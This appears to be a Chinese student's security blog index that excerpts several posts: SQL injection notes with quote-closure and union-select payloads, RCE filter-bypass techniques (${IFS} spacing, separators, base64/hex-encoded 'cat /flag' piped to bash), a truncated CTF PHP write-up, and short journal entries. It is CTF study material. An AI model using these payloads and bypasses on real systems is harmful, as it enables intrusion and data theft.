web安全-SQL注入
注入流程1.判断注入点(url,输入框,请求头中等与数据库交互的地方)
2.判断是字符型还是数字型(注入and 1=1 1=2 或者 3-1类似方式)
3.若是字符型,找到闭合方式,类似:
12345678or 1=1 --+’ or 1=1 --+" or 1=1 --+) or 1=1 --+‘) or 1=1 --+‘)) or 1=1 --+") or 1=1 --+")) or 1=1 --+
4.判断查询列数长短(group by 或者 order by)
注:
若有回显,查询回显位(查询-1)后可以利用union联合注入
若无回显(有报错回显),可以选择盲注(布尔盲注和时间盲注)或报错注入,若其中页面对注入的真假无反应,则无法使用布尔盲注
若无回显(无报错回显),同上但不能使用报错注入
union联合注入1.判断回显位union select 1,2,3,...,n
2.依次在回显位查库,表,列名:
查库:database()
查表:select group_concat(table_name) from ...
新周记1
周记1到了寒假了,对于基础漏洞也大概学过来一遍了,所以给自己开了个新坑
打算把之前学过的和之后遇见的关于漏洞打法和绕过的精华和重点部分做一个记录(持续更新)
作为知识总结方便之后的查阅或者复习,也作为一遍复习或是差缺补漏,因为确实了解到我的知识体系漏洞百出
这次总结的部分链接放在下面:
https://Hades-blog.github.io/2024/01/19/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93-web%E5%AE%89%E5%85%A8-RCE/
那么在之后,我打算继续往下学习,比如内网渗透的部分
并且增进实操能力,多增加点解题思路和上手实践,没事做做ctf或是看看wp,因为这一部分确实引发了一些我的思考
现在确实发现了学习部分和实操方面差距很大,光听懂了但一到实战就懵逼了哈哈
果然不论是开始的web安全还是之后的渗透测试都是实践至上,多操作,多去复盘..接下来,坚持下去才是真理啊
web安全-RCE(远程代码执行/命令执行)
空格过滤替代:<、<>、%20(space),%09(tab)、${IFS}、$IFS、$IFS$1、$IFS$9(最后的数字可以改)
命令分隔符作用:https://blog.csdn.net/weixin_43847838/article/details/111602811
windows: %0a & | %1aliunx: %0a %0d ; & | && ||(分号就是正常的连接两条语句)
花括号的别样用法在Linux bash中还可以使用{OS COMMAND,ARGUMENT}来执行系统命令,比如{cat,flag}
拼接绕过比如a=fl;b=ag;cat $a$b
编码绕过123base64,例如 echo“Y2F0lC9mbGFn"|base64-dlbash ==> cat /flaghex,例如 echo636174202f666c6167"|xxd -r-p|bash ==> cat /flagoct,例如 $(printf"\x63\x61\x74\ ...
2023春秋杯冬季赛CTF-web
ezezez_php123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110<?phphighlight_file(__FILE__);include "function.php";class Rd{ public $ending; public $cl; public $poc; public function __destruct() { echo "All matters have concluded"."</br>"; } public ...
周记7-C语言大作业
C语言大作业这周主要以c语言学习和c语言项目开发为主,有时间会在后续更新部分制作过程